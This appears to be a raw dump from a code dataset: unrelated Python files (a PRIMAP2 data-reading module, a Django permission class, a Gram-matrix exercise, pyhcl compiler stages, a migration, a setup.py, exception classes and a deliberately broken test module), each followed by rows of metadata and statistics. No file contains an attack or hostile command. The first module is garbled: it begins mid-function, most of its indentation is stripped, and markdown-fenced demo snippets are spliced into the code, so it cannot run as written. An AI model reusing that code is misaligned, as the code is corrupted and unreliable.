if filter_remove:
queries = []
for filter_spec in filter_remove.values():
q = spec_to_query_string(filter_spec)
queries.append(f"~({q})")
query = " & ".join(queries)
data.query(query, inplace=True)
data.reset_index(drop=True, inplace=True)
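# Keep-filters are OR-ed together while remove-filters are negated and AND-ed;
# a toy demonstration with invented scenario and region values:

```python
import pandas as pd

data = pd.DataFrame(
    {"scenario": ["HISTORY", "SSP1", "SSP2"], "region": ["USA", "USA", "DEU"]}
)
# filter_keep with two rules: rows matching either rule survive
keep_query = "(region == 'USA') | (scenario == 'SSP2')"
data = data.query(keep_query)
# filter_remove: rows matching any rule are dropped
remove_query = "~(scenario == 'HISTORY')"
data = data.query(remove_query).reset_index(drop=True)
# remaining scenarios: ["SSP1", "SSP2"]
```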
def fill_from_other_col(
df: pd.DataFrame,
*,
coords_value_filling: Dict[str, Dict[str, Dict[str, str]]],
attrs: Dict[str, Any],
) -> pd.DataFrame:
"""
    Fill values in one column based on values in other columns.
It can be used to fill NaN values or to replace e.g. non-standard or
non-unique category codes based on category names. It operates on pandas
DataFrames.
Parameters
----------
df : pd.DataFrame
Data to operate on
coords_value_filling : dict
A dict with primap2 dimension names as keys. These are the target columns where
        values will be filled (or replaced). Values are dicts with primap2 dimension
names as keys. These are the source columns. The values are dicts with source
value - target value mappings.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
attrs : dict
Dataset attributes
Returns
-------
pd.DataFrame
"""
dim_aliases = _alias_selection.translations_from_attrs(attrs, include_entity=True)
# loop over target columns in value mapping
for target_col in coords_value_filling:
target_info = coords_value_filling[target_col]
# loop over source columns
for source_col in target_info:
mapping_info = target_info[source_col]
# loop over cases
target_col_name = dim_aliases.get(target_col, target_col)
source_col_name = dim_aliases.get(source_col, source_col)
for source_value in mapping_info:
                df.loc[
                    df[source_col_name] == source_value, target_col_name
                ] = mapping_info[source_value]
return df
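# The core fill/replace step can be sketched without the attrs machinery; the
# column names and category codes below are invented for illustration.

```python
import pandas as pd

data = pd.DataFrame(
    {
        "category": [None, "1.A", "wrong_code"],
        "category_name": ["Energy", "Fuel Combustion", "Transport"],
    }
)
# source value -> target value mapping, as in coords_value_filling
mapping = {"Energy": "1", "Transport": "1.A.3"}
for source_value, target_value in mapping.items():
    # fill (or overwrite) the target column wherever the source column matches
    data.loc[data["category_name"] == source_value, "category"] = target_value
# category is now ["1", "1.A", "1.A.3"]
```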
def add_dimensions_from_defaults(
data: pd.DataFrame,
coords_defaults: Dict[str, Any],
additional_allowed_coords: Iterable[str] = (),
):
if_columns = (
INTERCHANGE_FORMAT_OPTIONAL_COLUMNS
+ INTERCHANGE_FORMAT_MANDATORY_COLUMNS
+ list(additional_allowed_coords)
)
for coord in coords_defaults.keys():
if coord in if_columns or coord.startswith(SEC_CATS_PREFIX):
# add column to dataframe with default value
data[coord] = coords_defaults[coord]
else:
raise ValueError(
f"{coord!r} given in coords_defaults is unknown - prefix with "
f"{SEC_CATS_PREFIX!r} to add a secondary category."
)
def map_metadata(
data: pd.DataFrame,
*,
meta_mapping: Dict[str, Union[str, Callable, dict]],
attrs: Dict[str, Any],
):
"""Map the metadata according to specifications given in meta_mapping.
First map entity, then the rest."""
    if "entity" in meta_mapping:
        # work on a copy so the caller's mapping dict is not mutated
        meta_mapping = meta_mapping.copy()
        meta_mapping_entity = {"entity": meta_mapping.pop("entity")}
        map_metadata_unordered(data, meta_mapping=meta_mapping_entity, attrs=attrs)
    map_metadata_unordered(data, meta_mapping=meta_mapping, attrs=attrs)
def map_metadata_unordered(
data: pd.DataFrame,
*,
meta_mapping: Dict[str, Union[str, Callable, dict]],
attrs: Dict[str, Any],
):
"""Map the metadata according to specifications given in meta_mapping."""
dim_aliases = _alias_selection.translations_from_attrs(attrs, include_entity=True)
# TODO: add additional mapping functions here
# values: (function, additional arguments)
mapping_functions = {
"PRIMAP1": {
"category": (_conversion.convert_ipcc_code_primap_to_primap2, []),
"entity": (_conversion.convert_entity_gwp_primap_to_primap2, []),
"unit": (
_conversion.convert_unit_primap_to_primap2,
[dim_aliases.get("entity", "entity")],
),
}
}
meta_mapping_df = {}
# preprocess meta_mapping
for column, mapping in meta_mapping.items():
column_name = dim_aliases.get(column, column)
if isinstance(mapping, str) or callable(mapping):
if isinstance(mapping, str): # need to translate to function first
try:
func, args = mapping_functions[mapping][column]
except KeyError:
logger.error(
f"Unknown metadata mapping {mapping!r} for column {column!r}, "
f"known mappings are: {list(mapping_functions.keys())}."
)
raise ValueError(
f"Unknown metadata mapping {mapping!r} for column {column!r}."
)
else:
func = mapping
args = []
if not args: # simple case: no additional args needed
values_to_map = data[column_name].unique()
values_mapped = map(func, values_to_map)
meta_mapping_df[column_name] = dict(zip(values_to_map, values_mapped))
else: # need to supply additional arguments
# this can't be handled using the replace()-call later since the mapped
# values don't depend on the original values only, therefore
# we do it directly
sel = [column_name] + args
values_to_map = np.unique(data[sel].to_records(index=False))
for vals_to_map in values_to_map:
# we replace values where all the arguments match - build a
# selector for that, then do the replacement
selector = data[column_name] == vals_to_map[0]
for i, arg in enumerate(args):
selector &= data[arg] == vals_to_map[i + 1]
data.loc[selector, column_name] = func(*vals_to_map)
else:
meta_mapping_df[column_name] = mapping
data.replace(meta_mapping_df, inplace=True)
def rename_columns(
data: pd.DataFrame,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]],
coords_defaults: Dict[str, Any],
coords_terminologies: Dict[str, str],
) -> dict:
"""Rename columns to match PRIMAP2 specifications and generate the corresponding
dataset-wide attrs for PRIMAP2."""
attr_names = {"category": "cat", "scenario": "scen", "area": "area"}
attrs = {}
sec_cats = []
coord_renaming = {}
for coord in itertools.chain(coords_cols, coords_defaults):
if coord in coords_terminologies:
name = f"{coord} ({coords_terminologies[coord]})"
if coord == "entity":
attrs["entity_terminology"] = coords_terminologies[coord]
else:
name = coord
if coord.startswith(SEC_CATS_PREFIX):
name = name[len(SEC_CATS_PREFIX) :]
sec_cats.append(name)
elif coord in attr_names:
attrs[attr_names[coord]] = name
coord_renaming[coords_cols.get(coord, coord)] = name
for coord in add_coords_cols:
coord_renaming[add_coords_cols[coord][0]] = coord
data.rename(columns=coord_renaming, inplace=True)
if sec_cats:
attrs["sec_cats"] = sec_cats
return attrs
def harmonize_units(
data: pd.DataFrame,
*,
    unit_col: Optional[str] = None,
attrs: Optional[dict] = None,
dimensions: Iterable[str],
) -> None:
"""
Harmonize the units of the input data. For each entity, convert
all time series to the same unit (the unit that occurs first). Units must already
be in PRIMAP2 style.
Parameters
----------
data: pd.DataFrame
data for which the units should be harmonized
unit_col: str, optional
column name for unit column. Default: "unit"
attrs: dict, optional
attrs defining the aliasing of columns. If attrs contains "entity_terminology",
"entity (<entity_terminology>)" will be used as the entity column, otherwise
simply "entity" will be used as the entity column.
dimensions: list of str
the dimensions, i.e. the metadata columns.
Returns
-------
None
The data is altered in place.
"""
# we need to convert the data such that we have one unit per entity
data_cols = list(set(data.columns.values) - set(dimensions))
    if attrs is not None:
        dim_aliases = _alias_selection.translations_from_attrs(
            attrs, include_entity=True
        )
    else:
        dim_aliases = {}
    entity_col = dim_aliases.get("entity", "entity")
    if unit_col is None:
        unit_col = dim_aliases.get("unit", "unit")
entities = data[entity_col].unique()
for entity in entities:
# get all units for this entity
data_this_entity = data.loc[data[entity_col] == entity]
units_this_entity = data_this_entity[unit_col].unique()
        if len(units_this_entity) > 1:
            # Unit conversion needed: convert everything to the first unit
            # that occurs. (Converting to base units is impractical because
            # they use the second as the time unit.)
            unit_to = units_this_entity[0]
            for unit in units_this_entity[1:]:
                unit_pint = ureg[unit]
                unit_pint = unit_pint.to(unit_to)
                factor = unit_pint.magnitude
                mask = (data[entity_col] == entity) & (data[unit_col] == unit)
                data.loc[mask, data_cols] *= factor
                data.loc[mask, unit_col] = unit_to
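# A simplified sketch of the per-entity harmonization above, with a hard-coded
# conversion factor standing in for the pint unit-registry lookup; all values
# are invented.

```python
import pandas as pd

data = pd.DataFrame(
    {
        "entity": ["CO2", "CO2"],
        "unit": ["Gg CO2 / yr", "Mt CO2 / yr"],
        "2000": [1000.0, 2.0],
    }
)
# pretend the registry says 1 Mt CO2 / yr == 1000 Gg CO2 / yr
factor = 1000.0
mask = (data["entity"] == "CO2") & (data["unit"] == "Mt CO2 / yr")
data.loc[mask, ["2000"]] *= factor
data.loc[mask, "unit"] = "Gg CO2 / yr"
# both rows now share the unit "Gg CO2 / yr"; the second row's value is 2000.0
```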
def sort_columns_and_rows(
data: pd.DataFrame,
dimensions: Iterable[Hashable],
) -> (pd.DataFrame, List[Hashable]):
"""Sort the data.
The columns are ordered according to the order in
INTERCHANGE_FORMAT_COLUMN_ORDER, with secondary categories alphabetically after
the category and all date columns in order at the end.
The rows are ordered by values of the non-date columns.
Parameters
----------
data: pd.DataFrame
data which should be ordered
dimensions: list of str
the dimensions, i.e. the metadata columns.
Returns
-------
sorted, dimensions_sorted : (pd.DataFrame, list of str)
the input data frame with columns and rows ordered and the dimensions sorted.
"""
time_cols = list(set(data.columns.values) - set(dimensions))
other_cols = list(dimensions)
cols_sorted = []
for col in INTERCHANGE_FORMAT_COLUMN_ORDER:
for ocol in other_cols:
if ocol == col or (isinstance(ocol, str) and ocol.startswith(f"{col} (")):
cols_sorted.append(ocol)
other_cols.remove(ocol)
break
cols_sorted += list(sorted(other_cols))
data: pd.DataFrame = data[cols_sorted + list(sorted(time_cols))]
data.sort_values(by=cols_sorted, inplace=True)
data.reset_index(inplace=True, drop=True)
return data, cols_sorted
| 38.329403 | 138 | 0.661354 | 6,943 | 52,013 | 4.783091 | 0.068126 | 0.033124 | 0.021139 | 0.009275 | 0.752085 | 0.711644 | 0.686982 | 0.68099 | 0.667861 | 0.658165 | 0 | 0.005618 | 0.260819 | 52,013 | 1,356 | 139 | 38.35767 | 0.858142 | 0.505662 | 0 | 0.422886 | 0 | 0 | 0.077969 | 0.012714 | 0 | 0 | 0 | 0.005162 | 0 | 1 | 0.036484 | false | 0 | 0.018242 | 0 | 0.079602 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
204f7a689c9cb2fdb02cbe9f771915f1d9f47a4e | 286 | py | Python | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 10 | 2020-03-20T09:06:12.000Z | 2021-07-27T13:06:02.000Z | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 134 | 2020-03-23T09:47:48.000Z | 2022-03-12T01:05:19.000Z | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 71 | 2020-03-20T12:45:56.000Z | 2021-10-31T19:22:25.000Z | from rest_framework.permissions import BasePermission, SAFE_METHODS, IsAdminUser
class IsAdminOrReadOnly(IsAdminUser):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return True
return super().has_permission(request, view)
| 31.777778 | 80 | 0.741259 | 32 | 286 | 6.46875 | 0.71875 | 0.10628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 286 | 8 | 81 | 35.75 | 0.896104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
20568ee0e3d02dd89899fa7044dd4f56e65900a1 | 303 | py | Python | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | 3 | 2019-10-28T19:03:43.000Z | 2021-12-02T14:39:53.000Z | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | null | null | null | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | 1 | 2020-12-22T05:57:27.000Z | 2020-12-22T05:57:27.000Z | # GRADED FUNCTION: gram_matrix
def gram_matrix(A):
"""
Argument:
A -- matrix of shape (n_C, n_H*n_W)
Returns:
GA -- Gram matrix of A, of shape (n_C, n_C)
"""
### START CODE HERE ### (≈1 line)
GA = tf.matmul(A, tf.transpose(A))
### END CODE HERE ###
return GA
| 17.823529 | 47 | 0.547855 | 49 | 303 | 3.265306 | 0.530612 | 0.1875 | 0.1 | 0.1125 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004673 | 0.293729 | 303 | 16 | 48 | 18.9375 | 0.738318 | 0.561056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6463caa1511b00b8a92bd2e30addbd1f22879af8 | 1,629 | py | Python | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | from abc import ABC, abstractclassmethod
from dataclasses import dataclass
from pyhcl.ir import low_ir
from pyhcl.dsl.check_and_infer import CheckAndInfer
from pyhcl.passes.replace_subaccess import ReplaceSubaccess
from pyhcl.passes.replace_subindex import ReplaceSubindex
from pyhcl.passes.expand_aggregate import ExpandAggregate
from pyhcl.passes.expand_whens import ExpandWhens
from pyhcl.passes.expand_memory import ExpandMemory
from pyhcl.passes.optimize import Optimize
from pyhcl.passes.utils import AutoName
class Form(ABC):
@abstractclassmethod
def emit(self) -> str:
...
@dataclass
class HighForm(Form):
c: low_ir.Circuit
def emit(self) -> str:
self.c = CheckAndInfer.run(self.c)
return self.c.serialize()
@dataclass
class MidForm(Form):
def emit(self) -> str:
...
@dataclass
class LowForm(Form):
c: low_ir.Circuit
def emit(self) -> str:
AutoName()
self.c = CheckAndInfer.run(self.c)
self.c = ExpandMemory().run(self.c)
self.c = ReplaceSubaccess().run(self.c)
self.c = ExpandAggregate().run(self.c)
self.c = ExpandWhens().run(self.c)
self.c = ReplaceSubindex().run(self.c)
self.c = Optimize().run(self.c)
return self.c.serialize()
@dataclass
class Verilog(Form):
c: low_ir.Circuit
def emit(self) -> str:
self.c = CheckAndInfer.run(self.c)
self.c = ExpandAggregate().run(self.c)
self.c = ReplaceSubaccess().run(self.c)
self.c = ReplaceSubindex().run(self.c)
self.c = Optimize().run(self.c)
return self.c.verilog_serialize() | 28.578947 | 59 | 0.682627 | 214 | 1,629 | 5.140187 | 0.21028 | 0.131818 | 0.094545 | 0.109091 | 0.494545 | 0.494545 | 0.443636 | 0.443636 | 0.415455 | 0.335455 | 0 | 0 | 0.202578 | 1,629 | 57 | 60 | 28.578947 | 0.846805 | 0 | 0 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104167 | false | 0.145833 | 0.229167 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
6466039d821ee4154e806e7e1417d4aa6079ddfa | 1,312 | py | Python | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 20 | 2021-03-11T18:37:32.000Z | 2022-03-23T19:38:07.000Z | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 75 | 2021-02-12T02:37:33.000Z | 2022-03-29T20:56:16.000Z | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 5 | 2021-04-07T15:46:53.000Z | 2021-09-18T16:55:00.000Z | # Generated by Django 2.1.7 on 2019-03-14 01:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('qa', '0031_convert_null_mc_tols'),
]
operations = [
migrations.AlterField(
model_name='tolerance',
name='mc_pass_choices',
field=models.CharField(blank=True, default='', help_text='Comma seperated list of choices that are considered passing', max_length=2048, verbose_name='Multiple Choice OK Values'),
),
migrations.AlterField(
model_name='tolerance',
name='mc_tol_choices',
field=models.CharField(blank=True, default='', help_text='Comma seperated list of choices that are considered at tolerance', max_length=2048, verbose_name='Multiple Choice Tolerance Values'),
),
migrations.AlterField(
model_name='unittestcollection',
name='content_type',
field=models.ForeignKey(help_text='Choose whether to use a Test List or Test List Cycle', limit_choices_to={'app_label': 'qa', 'model__in': ['testlist', 'testlistcycle']}, on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType', verbose_name='Test List or Test List Cycle'),
),
]
| 43.733333 | 305 | 0.673018 | 158 | 1,312 | 5.424051 | 0.512658 | 0.03734 | 0.087515 | 0.101517 | 0.514586 | 0.466744 | 0.413069 | 0.221704 | 0.221704 | 0.221704 | 0 | 0.026188 | 0.214177 | 1,312 | 29 | 306 | 45.241379 | 0.805044 | 0.034299 | 0 | 0.347826 | 1 | 0 | 0.33913 | 0.038735 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
64776eed091b241829ab4063fb50e4b438cbec44 | 93 | py | Python | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 1 | 2020-12-26T21:23:40.000Z | 2020-12-26T21:23:40.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 2 | 2019-12-26T17:31:57.000Z | 2020-01-06T19:45:26.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 2 | 2019-11-02T08:03:09.000Z | 2020-06-29T14:52:15.000Z | """pytest-cov: avoid already-imported warning: PYTEST_DONT_REWRITE."""
__version__ = "2.7.1"
| 31 | 70 | 0.741935 | 13 | 93 | 4.846154 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.086022 | 93 | 2 | 71 | 46.5 | 0.705882 | 0.688172 | 0 | 0 | 0 | 0 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
647972ef3df92c37ae1a9e56b1fee62d768f30c4 | 172 | py | Python | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | null | null | null | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | 56 | 2018-07-31T01:00:54.000Z | 2020-08-06T16:00:02.000Z | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Hauberk Email Automations."""
__author__ = """Andrew Kail"""
__email__ = 'andrew.a.kail@gmail.com'
__version__ = '0.1.0'
| 21.5 | 54 | 0.656977 | 23 | 172 | 4.391304 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026846 | 0.133721 | 172 | 7 | 55 | 24.571429 | 0.651007 | 0.412791 | 0 | 0 | 0 | 0 | 0.410526 | 0.242105 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
647cc7bce9f45f757b716e12d2b594fad871f084 | 2,460 | py | Python | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 6 | 2019-09-16T13:07:20.000Z | 2021-06-02T19:02:05.000Z | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 325 | 2019-09-20T20:06:00.000Z | 2022-03-30T15:05:49.000Z | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 17 | 2019-08-02T16:55:47.000Z | 2021-06-26T19:13:35.000Z | # -*- coding: utf-8 -*-
"""
Useful exception classes that are used to return HTTP errors.
"""
class ApiException(Exception):
"""
The base exception class for all APIExceptions.
Parameters
----------
code : str
Error code.
message : str
Human readable string describing the exception.
status_code : int
HTTP status code.
"""
def __init__(self, code: str, message: str, status_code: int):
self.code = code
self.message = message
self.status_code = status_code
class BadRequest(ApiException):
"""
Bad Request response status code indicates that the server cannot or will not
process the request due to something that is perceived to be a client error.
A common cause is that the client has sent invalid request values.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=400)
class Forbidden(ApiException):
"""
Forbidden client error status response code indicates that the server understands
the request but refuses to authorize it.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=403)
class NotFound(ApiException):
"""
Not Found client error response code indicates that the server can't find the requested resource.
A common cause is that a provided ID does not exist in the database.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=404)
class InternalServerError(ApiException):
"""
Internal Server Error server error response code indicates that the server
encountered an unexpected condition that prevented it from fulfilling the request.
This error response is a generic "catch-all" response.
You should log error responses like the 500 status code with more details about
the request to prevent the error from happening again in the future.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=500)
class ServiceUnavailable(ApiException):
"""
Service Unavailable server error response code indicates that the server is
not ready to handle the request.
A common cause is that the database is not available or overloaded.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=503)
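A minimal usage sketch of the exception hierarchy above (the handler, error code, and payload shape are illustrative assumptions, not part of the original module):

```python
# Trimmed copies of the classes above, so the demo is self-contained.
class ApiException(Exception):
    def __init__(self, code, message, status_code):
        self.code = code
        self.message = message
        self.status_code = status_code

class NotFound(ApiException):
    def __init__(self, code, message):
        super().__init__(code, message, status_code=404)

def get_project(db, project_id):
    # Translate a failed lookup into a structured HTTP error payload,
    # which is the pattern these exception classes are built for.
    try:
        return 200, db[project_id]
    except KeyError:
        exc = NotFound("ProjectNotFound", "The specified project does not exist")
        return exc.status_code, {"code": exc.code, "message": exc.message}

status, body = get_project({"p1": {"name": "demo"}}, "p2")
print(status)  # 404
```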
| 29.285714 | 101 | 0.69065 | 321 | 2,460 | 5.127726 | 0.358255 | 0.072904 | 0.040097 | 0.054678 | 0.344471 | 0.31774 | 0.271567 | 0.230863 | 0.176185 | 0.176185 | 0 | 0.010053 | 0.231707 | 2,460 | 83 | 102 | 29.638554 | 0.860847 | 0.545935 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
647ed5cef9f088b96e328f883e5a96af60b1a881 | 1,058 | py | Python | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | null | null | null | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | 1 | 2019-01-29T14:11:15.000Z | 2019-01-29T14:11:15.000Z | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
setup(
name='pytest-usefixturesif',
description='pytest plugin that makes it possible to have fixtures used only when a condition applies',
long_description=open("README.md").read(),
version='0.0.2',
url='https://github.com/adrianer/pytest-usefixturesif',
download_url='https://github.com/adrianer/pytest-usefixturesif/archive/0.1.tar.gz',
license='BSD',
author='Adrian Kalla',
author_email='adrian.kalla@gmail.com',
py_modules=['pytest_usefixturesif'],
entry_points={'pytest11': ['usefixturesif = pytest_usefixturesif']},
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=['pytest>=3.3.2'],
keywords=['testing', 'fixtures', 'condition'],
classifiers=[
"Framework :: Pytest",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
]
)
| 36.482759 | 107 | 0.65879 | 120 | 1,058 | 5.716667 | 0.616667 | 0.138484 | 0.182216 | 0.113703 | 0.12828 | 0.12828 | 0.12828 | 0 | 0 | 0 | 0 | 0.02093 | 0.187146 | 1,058 | 28 | 108 | 37.785714 | 0.776744 | 0 | 0 | 0 | 0 | 0.037037 | 0.546314 | 0.020794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64804597fb314c190aa7abcde79f44a874b88f4e | 1,224 | py | Python | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | null | null | null | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | 1 | 2018-10-30T03:14:34.000Z | 2018-10-30T03:19:35.000Z | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | null | null | null | # -*- coding: utf-8 -*-
"""An intentionally broken codebase."""
try:
import demo.err
except ImportError:
pass
if not getattr(demo, 'err', None):
import sys
demo.err = sys.modules[__name__]
import metax.root
import sys
class AMeta(metax.root.ObjectMeta):
"""Auto-generated meta class for demo.err.A."""
def __init__(cls, name, bases, symbols):
"""No comment provided.
Args:
name: &str
bases: &#vec<class>
symbols: &#map
"""
super(AMeta, cls).__init__(name, bases, symbols)
# User-provided code follows.
class A(metax.root.Object):
"""Undocumented."""
__metaclass__ = AMeta
def __init__(self):
super(A, self).__init__()
# User-provided code follows.
def f(self):
self.g()
def g(self):
self.h()
def h(self):
raise Exception()
def meta(self):
result = self.__class__
assert issubclass(result, A)
assert issubclass(result, MetaA)
return result
def printMeta(self, fp=sys.stdout, indent=''):
"""Auto-generated human-readable summary of this object.
Args:
fp: ostream
indent: str
"""
subindent = indent + " "
